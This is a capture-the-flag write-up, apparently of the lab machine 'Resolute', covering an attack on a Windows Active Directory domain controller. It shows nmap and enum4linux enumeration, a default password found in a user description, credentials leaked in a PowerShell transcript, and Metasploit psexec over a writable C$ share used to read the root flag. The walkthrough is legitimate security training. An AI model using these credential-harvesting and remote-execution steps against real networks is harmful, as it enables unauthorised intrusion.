$ cat nmap_A.nmap # Nmap 7.80 scan initiated Fri Mar 20 17:46:45 2020 as: nmap -A -p- -oA nmap_A -v 10.10.10.169 Nmap scan report for 10.10.10.169 Host is up (0.028s latency). Not shown: 65511 closed ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-20 16:55:41Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49671/tcp open msrpc Microsoft Windows RPC 49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49677/tcp open msrpc Microsoft Windows RPC 49688/tcp open msrpc Microsoft Windows RPC 49709/tcp open msrpc Microsoft Windows RPC 51347/tcp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=3/20%Time=5E74F396%P=x86_64-unknown-linux-gnu%r SF:(DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07ver SF:sion\x04bind\0\0\x10\0\x03"); Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_clock-skew: mean: 2h28m28s, deviation: 4h02m29s, median: 8m27s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Resolute | NetBIOS computer name: RESOLUTE\x00 | Domain name: megabank.local | Forest name: megabank.local | FQDN: Resolute.megabank.local |_ System time: 2020-03-20T09:57:01-07:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-03-20T16:57:03 |_ start_date: 2020-03-19T21:50:57
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Mar 20 17:50:47 2020 -- 1 IP address (1 host up) scanned in 242.33 seconds
We have Windows machine with SMB, LDAP, WinRM, etc. exposed.
So I'll see if crackmapexec can find the same information as the
smb-os-discoverynmap script (NSE).
BlackArch: pacman -S crackmapexec
1 2
$ cme smb 10.10.10.169 SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:MEGABANK) (signing:True) (SMBv1:True)
Okay fine, SMB looks like a good place to start, so I'll use enum4linux
to enumeration information over SMB.
============================================ | Nbtstat Information for 10.10.10.169 | ============================================ Looking up status of 10.10.10.169 No reply from 10.10.10.169
===================================== | Session Check on 10.10.10.169 | ===================================== [+] Server 10.10.10.169 allows sessions using username '', password '' [+] Got domain/workgroup name:
=========================================== | Getting domain SID for 10.10.10.169 | =========================================== Unable to initialize messaging context Domain Name: MEGABANK Domain Sid: S-1-5-21-1392959593-3013219662-3596683436 [+] Host is part of a domain (not a workgroup)
====================================== | OS information on 10.10.10.169 | ====================================== [+] Got OS info for 10.10.10.169 from smbclient: [+] Got OS info for 10.10.10.169 from srvinfo: Unable to initialize messaging context Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
========================================= | Share Enumeration on 10.10.10.169 | ========================================= Unable to initialize messaging context do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment --------- ---- ------- Reconnecting with SMB1 for workgroup listing. Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.169
==================================================== | Password Policy Information for 10.10.10.169 | ==================================================== [E] Unexpected error from polenum:
[+] Getting local group memberships: Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs Group 'DnsAdmins' (RID: 1101) has member: Couldn't lookup SIDs
[+] Getting domain group memberships: Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator Group 'Schema Admins' (RID: 518) has member: MEGABANK\Administrator Group 'Enterprise Admins' (RID: 519) has member: MEGABANK\Administrator Group 'Domain Controllers' (RID: 516) has member: MEGABANK\RESOLUTE$ Group 'Contractors' (RID: 1103) has member: MEGABANK\ryan Group 'Domain Admins' (RID: 512) has member: MEGABANK\Administrator Group 'Domain Computers' (RID: 515) has member: MEGABANK\MS02$ Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator Group 'Domain Users' (RID: 513) has member: MEGABANK\DefaultAccount Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt Group 'Domain Users' (RID: 513) has member: MEGABANK\ryan Group 'Domain Users' (RID: 513) has member: MEGABANK\marko Group 'Domain Users' (RID: 513) has member: MEGABANK\sunita Group 'Domain Users' (RID: 513) has member: MEGABANK\abigail Group 'Domain Users' (RID: 513) has member: MEGABANK\marcus Group 'Domain Users' (RID: 513) has member: MEGABANK\sally Group 'Domain Users' (RID: 513) has member: MEGABANK\fred Group 'Domain Users' (RID: 513) has member: MEGABANK\angela Group 'Domain Users' (RID: 513) has member: MEGABANK\felicia Group 'Domain Users' (RID: 513) has member: MEGABANK\gustavo Group 'Domain Users' (RID: 513) has member: MEGABANK\ulf Group 'Domain Users' (RID: 513) has member: MEGABANK\stevie Group 'Domain Users' (RID: 513) has member: MEGABANK\claire Group 'Domain Users' (RID: 513) has member: MEGABANK\paulo Group 'Domain Users' (RID: 513) has member: MEGABANK\steve Group 'Domain Users' (RID: 513) has member: MEGABANK\annette Group 'Domain Users' (RID: 513) has member: MEGABANK\annika Group 'Domain Users' (RID: 513) has member: MEGABANK\per Group 'Domain Users' (RID: 513) has member: MEGABANK\claude Group 'Domain Users' (RID: 513) has member: MEGABANK\melanie Group 'Domain Users' (RID: 513) has member: MEGABANK\zach Group 'Domain Users' (RID: 513) has member: MEGABANK\simon Group 'Domain Users' (RID: 513) has member: MEGABANK\naoki
======================================================================= | Users on 10.10.10.169 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================= [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
============================================= | Getting printer info for 10.10.10.169 | ============================================= Unable to initialize messaging context Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Fri Mar 20 21:21:35 2020
We have what seems a default password and a list of users.
1
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
System enumeration, elevation of privilege: melanie to ryan#
TL;DR: creds leaked in a file
Let's see local users on the machine:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
*Evil-WinRM* PS C:\Users\melanie> net user
User accounts for \\
------------------------------------------------------------------------------- abigail Administrator angela annette annika claire claude DefaultAccount felicia fred Guest gustavo krbtgt marcus marko melanie naoki paulo per ryan sally simon steve stevie sunita ulf zach The command completed with one or more errors.
Let's check groups of some user, maybe we can learn more than previously with
enum4linux:
*Evil-WinRM* PS C:\Users\melanie> net user melanie User name melanie Full Name Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never
Password last set 3/20/2020 2:46:11 PM Password expires Never Password changeable 3/21/2020 2:46:11 PM Password required Yes User may change password Yes
Workstations allowed All Logon script User profile Home directory Last logon Never
Logon hours allowed All
Local Group Memberships *Remote Management Use Global Group memberships *Domain Users The command completed successfully.
Our user melanie doesn't seem very privileged. Let's see about ryan:
*Evil-WinRM* PS C:\Users\melanie> net user ryan User name ryan Full Name Ryan Bertrand Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never
Password last set 3/20/2020 2:46:10 PM Password expires Never Password changeable 3/21/2020 2:46:10 PM Password required Yes User may change password Yes
Workstations allowed All Logon script User profile Home directory Last logon Never
Logon hours allowed All
Local Group Memberships Global Group memberships *Domain Users *Contractors The command completed successfully.
ryan is in the Contractors group, he can be a more interesting target.
Then I did some file enumeration on the file system and found there was a
PSTranscripts folder in C:\ with a promising text file inside:
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }" >> CommandInvocation(Out-String): "Out-String" >> ParameterBinding(Out-String): name="Stream"; value="True" ********************** Windows PowerShell transcript start Start time: 20191203063515 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0) Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding Process ID: 2800 PSVersion: 5.1.14393.2273 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 ********************** ********************** Command start time: 20191203063515 ********************** PS>CommandInvocation(Out-String): "Out-String" >> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:" cmd : The syntax of this command is: At line:1 char:1 + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError cmd : The syntax of this command is: At line:1 char:1 + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError ********************** Windows PowerShell transcript start Start time: 20191203063515 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0) Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding Process ID: 2800 PSVersion: 5.1.14393.2273 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 **********************
As you see the logs are leaking credentials: ryan / Serv3r4Admin4cc123!.
System elevation of privilege: ryan to administrator#
TL;DR: I had luck, should have been DNS service EoP
We can connect with ryan using evil-winrm, but as a note on the
desktop tells us, the connection will be reset every minutes.
1 2 3 4 5 6 7 8 9 10
$ evil-winrm -i 10.10.10.169 -u ryan -p 'Serv3r4Admin4cc123!'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan> type Desktop/note.txt Email to team:
- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute
As our shell is reverted too quickly we have to find another way to elevate our
privilege. Let's see with crackmapexec if there are some interesting
shares:
I found that C$ share was writable by ryan so we can use a psexec msf
exploit to execute commands. Getting a shell would be useless
because of the 1 min limit, so let's just copy the flag into ryan home.
It seems ryan has admin privileges.
Name Current Setting Required Description ---- --------------- -------- ----------- COMMAND copy C:\Users\Administrator\Desktop\root.txt C:\Users\ryan\Videos\noraj.txt yes The command you want to execute on the remote host RHOSTS 10.10.10.169 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The Target port SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SMBDomain MEGABANK no The Windows domain to use for authentication SMBPass Serv3r4Admin4cc123! no The password for the specified username SMBSHARE C$ yes The name of a writeable share on the server SMBUser ryan no The username to authenticate as THREADS 1 yes The number of concurrent threads (max one per host) WINPATH Users\ryan\Videos yes The name of the remote Windows directory
1 2
*Evil-WinRM* PS C:\Users\ryan\Videos> type noraj.txt e1d94876a506850d0c20edb5405e619c